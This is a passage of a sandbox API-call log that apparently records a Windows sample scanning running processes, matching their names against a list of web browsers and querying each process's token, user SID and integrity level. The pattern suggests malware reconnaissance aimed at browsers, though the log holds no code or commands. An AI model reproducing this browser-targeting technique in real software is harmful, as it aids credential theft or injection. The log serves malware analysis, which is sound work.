lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0506.670] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0506.670] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0506.670] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0506.670] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0506.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0506.670] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0506.670] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0506.670] GetLastError () returned 0x7a [0506.670] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0506.670] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0506.670] CloseHandle (hObject=0x3bc) returned 1 [0506.670] CloseHandle (hObject=0x5a4) returned 1 [0506.670] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0506.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0506.670] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376220, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">¸") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0506.670] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0506.670] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0506.670] GetLastError () returned 0x7a [0506.670] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0506.670] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0506.670] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0506.670] CloseHandle (hObject=0x3bc) returned 1 [0506.670] CloseHandle (hObject=0x5a4) returned 1 [0506.670] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0506.670] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0506.670] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0506.670] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0506.670] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0506.670] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0506.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0506.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0506.670] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0506.670] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0506.670] GetLastError () returned 0x7a [0506.670] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0506.670] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0506.671] CloseHandle (hObject=0x3bc) returned 1 [0506.671] CloseHandle (hObject=0x5a4) returned 1 [0506.671] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0506.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0506.671] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376868, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">¹") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0506.671] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0506.671] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0506.671] GetLastError () returned 0x7a [0506.671] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0506.671] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0506.671] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0506.671] CloseHandle (hObject=0x3bc) returned 1 [0506.671] CloseHandle (hObject=0x5a4) returned 1 [0506.671] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0506.671] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0506.671] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0506.671] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0506.671] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0506.671] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0506.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0506.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0506.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0506.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0506.671] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0506.671] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0506.671] GetLastError () returned 0x7a [0506.671] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0506.671] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0506.671] CloseHandle (hObject=0x3bc) returned 1 [0506.671] CloseHandle (hObject=0x5a4) returned 1 [0506.671] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0506.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0506.671] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376c10, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">º") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0506.671] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0506.671] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0506.671] GetLastError () returned 0x7a [0506.671] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0506.671] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0506.672] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0506.672] CloseHandle (hObject=0x3bc) returned 1 [0506.672] CloseHandle (hObject=0x5a4) returned 1 [0506.672] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0506.672] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0506.672] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0506.672] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0506.672] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0506.672] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0506.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0506.672] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0506.672] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0508.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa248) returned 0xc0000004 [0508.677] VirtualAlloc (lpAddress=0x0, dwSize=0xb248, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0508.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb248, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0508.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0508.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0508.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0508.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0508.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0508.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0508.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0508.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0508.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0508.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0508.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0508.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0508.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0508.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0508.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0508.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0508.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0508.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0508.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0508.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0508.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0508.681] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0508.681] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0508.681] GetLastError () returned 0x7a [0508.681] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0508.681] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0508.681] CloseHandle (hObject=0x3bc) returned 1 [0508.682] CloseHandle (hObject=0x5a4) returned 1 [0508.682] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0508.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0508.682] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x377d28, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">»") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0508.682] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0508.682] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0508.682] GetLastError () returned 0x7a [0508.682] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0508.682] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0508.683] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0508.683] CloseHandle (hObject=0x3bc) returned 1 [0508.683] CloseHandle (hObject=0x5a4) returned 1 [0508.683] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0508.683] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0508.683] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0508.683] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0508.683] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0508.683] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0508.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0508.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0508.684] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0508.684] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0508.684] GetLastError () returned 0x7a [0508.684] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0508.684] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0508.684] CloseHandle (hObject=0x3bc) returned 1 [0508.684] CloseHandle (hObject=0x5a4) returned 1 [0508.685] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0508.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0508.685] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375a20, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">¼") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0508.685] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0508.685] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0508.685] GetLastError () returned 0x7a [0508.685] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0508.686] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0508.686] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0508.686] CloseHandle (hObject=0x3bc) returned 1 [0508.686] CloseHandle (hObject=0x5a4) returned 1 [0508.686] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0508.686] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0508.686] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0508.686] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0508.687] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0508.687] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0508.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0508.687] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0508.687] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0508.687] GetLastError () returned 0x7a [0508.687] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0508.687] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0508.688] CloseHandle (hObject=0x3bc) returned 1 [0508.688] CloseHandle (hObject=0x5a4) returned 1 [0508.688] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0508.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0508.688] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x3761e0, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">½") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0508.688] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0508.688] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0508.689] GetLastError () returned 0x7a [0508.689] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0508.689] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0508.689] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0508.689] CloseHandle (hObject=0x3bc) returned 1 [0508.689] CloseHandle (hObject=0x5a4) returned 1 [0508.689] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0508.690] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0508.690] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0508.690] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0508.690] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0508.690] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0508.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0508.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0508.690] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0508.690] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0508.691] GetLastError () returned 0x7a [0508.691] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0508.691] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0508.691] CloseHandle (hObject=0x3bc) returned 1 [0508.691] CloseHandle (hObject=0x5a4) returned 1 [0508.691] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0508.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0508.692] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376828, 